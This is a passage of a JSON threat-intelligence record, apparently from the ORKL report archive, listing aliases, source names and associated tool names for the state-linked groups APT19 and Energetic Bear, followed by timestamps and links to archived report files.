			"source_name": "MISPGALAXY:APT12",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "46a151bd-e4c2-46f9-aee9-ee6942b01098",
			"created_at": "2023-01-06T13:46:38.288168Z",
			"updated_at": "2026-04-10T02:00:02.911919Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"DEEP PANDA",
				"Codoso",
				"KungFu Kittens",
				"Group 13",
				"G0009",
				"G0073",
				"Checkered Typhoon",
				"Black Vine",
				"TEMP.Avengers",
				"PinkPanther",
				"Shell Crew",
				"BRONZE FIRESTONE",
				"Sunshop Group"
			],
			"source_name": "MISPGALAXY:APT19",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5cbf6c32-482d-4cd2-9d11-0d9311acdc28",
			"created_at": "2023-01-06T13:46:38.39927Z",
			"updated_at": "2026-04-10T02:00:02.958273Z",
			"deleted_at": null,
			"main_name": "ENERGETIC BEAR",
			"aliases": [
				"BERSERK BEAR",
				"ALLANITE",
				"Group 24",
				"Koala Team",
				"G0035",
				"ATK6",
				"ITG15",
				"DYMALLOY",
				"TG-4192",
				"Crouching Yeti",
				"Havex",
				"IRON LIBERTY",
				"Blue Kraken",
				"Ghost Blizzard"
			],
			"source_name": "MISPGALAXY:ENERGETIC BEAR",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434033,
	"ts_updated_at": 1775791970,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f991ff9f99d7377f2bbe581513b076c4315664ca.pdf",
		"text": "https://archive.orkl.eu/f991ff9f99d7377f2bbe581513b076c4315664ca.txt",
		"img": "https://archive.orkl.eu/f991ff9f99d7377f2bbe581513b076c4315664ca.jpg"
	}
}